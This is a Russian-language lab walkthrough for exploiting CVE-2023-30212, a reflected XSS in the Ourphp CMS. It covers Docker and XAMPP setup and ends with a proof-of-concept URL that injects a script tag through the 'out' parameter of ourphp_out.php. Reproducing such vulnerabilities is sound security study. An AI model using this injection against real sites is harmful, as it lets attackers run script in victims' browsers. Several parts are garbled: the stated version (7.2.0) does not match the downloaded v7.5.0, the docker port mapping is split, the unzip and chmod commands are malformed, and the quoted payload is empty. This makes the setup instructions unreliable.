
Эксплуатация уязвимости в Ourphp версии 7.2.0, также известной как CVE-2023-30212
Шаг 1. Загрузите и установите Docker в вашу систему (Примечание). Я использую Docker, потому что это быстро и легко установить ubuntu.
Шаг 2. Настройка среды Docker
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash
Шаг 3. Установка веб-сервера, php & mysql. Для этого я буду устанавливать сервер xampp.
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start
Шаг 4. Загрузите Ourphp версии 7.2.0
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775
Шаг 5. Настройка Ourphp в браузере Откройте браузер и введите localhost или 127.0.0.1 Следуйте инструкциям и установите Ourphp.
Шаг 6. Эксплуатация уязвимости Версия Ourphp 7.2.0 имеет уязвимость к XSS (Межсайтовый скриптинг). Чтобы устранить уязвимость в файле /client/manage/ourphp_out.php, которая позволяет выполнить XSS-код,
вам необходимо изменить код. Уязвимость возникает, когда параметр "ourphp_admin" установлен в "logout," а управляемая переменная "out" выводится.
Атакующие могут воспользоваться этим, внедрив полезную нагрузку, например "".
Code: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
